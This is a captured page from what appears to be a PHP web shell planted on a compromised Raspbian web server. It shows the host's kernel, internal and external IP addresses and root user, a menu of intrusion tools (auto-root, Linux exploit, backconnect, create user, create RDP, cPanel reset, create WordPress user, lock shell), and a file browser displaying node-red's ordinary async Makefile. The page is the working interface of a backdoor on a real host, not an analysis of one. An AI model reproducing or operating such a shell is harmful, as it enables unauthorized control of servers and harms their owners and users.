Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
node_modules /
node-red /
node_modules /
async /
[ HOME SHELL ]
Name
Size
Permission
Action
lib
[ DIR ]
drwxr-xr-x
LICENSE
1.03
KB
-rw-r--r--
Makefile
542
B
-rw-r--r--
index.js
163
B
-rw-r--r--
package.json
1.39
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Makefile
PACKAGE = asyncjs NODEJS = $(if $(shell test -f /usr/bin/nodejs && echo "true"),nodejs,node) CWD := $(shell pwd) NODEUNIT = $(CWD)/node_modules/nodeunit/bin/nodeunit UGLIFY = $(CWD)/node_modules/uglify-js/bin/uglifyjs NODELINT = $(CWD)/node_modules/nodelint/nodelint BUILDDIR = dist all: clean test build build: $(wildcard lib/*.js) mkdir -p $(BUILDDIR) $(UGLIFY) lib/async.js > $(BUILDDIR)/async.min.js test: $(NODEUNIT) test clean: rm -rf $(BUILDDIR) lint: $(NODELINT) --config nodelint.cfg lib/async.js .PHONY: test build all
Close